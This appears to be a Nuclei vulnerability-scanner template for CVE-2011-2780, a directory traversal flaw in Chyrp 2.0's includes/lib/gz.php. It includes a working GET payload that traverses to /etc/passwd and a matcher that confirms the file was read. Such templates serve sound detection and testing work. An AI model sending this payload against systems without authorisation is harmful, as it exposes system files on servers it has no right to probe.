my-nuclei-templates/CVE-2011-2780.yaml

36 lines
1.2 KiB
YAML
Raw Normal View History

2021-09-17 06:03:58 +00:00
id: CVE-2011-2780
info:
name: Chyrp 2.x - Local File Inclusion (LFI)
author: daffainfo
severity: high
tags: cve,cve2011,lfi,chyrp
description: "Directory traversal vulnerability in includes/lib/gz.php in Chyrp 2.0 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter, a different vulnerability than CVE-2011-2744."
reference:
- http://www.justanotherhacker.com/advisories/JAHx113.txt
- http://www.openwall.com/lists/oss-security/2011/07/13/5
- http://www.ocert.org/advisories/ocert-2011-001.html
- http://www.openwall.com/lists/oss-security/2011/07/13/6
- http://www.securityfocus.com/bid/48672
- http://secunia.com/advisories/45184
- http://osvdb.org/73891
- http://securityreason.com/securityalert/8312
- https://exchange.xforce.ibmcloud.com/vulnerabilities/68565
- http://www.securityfocus.com/archive/1/518890/100/0/threaded
requests:
- method: GET
path:
- "{{BaseURL}}/includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200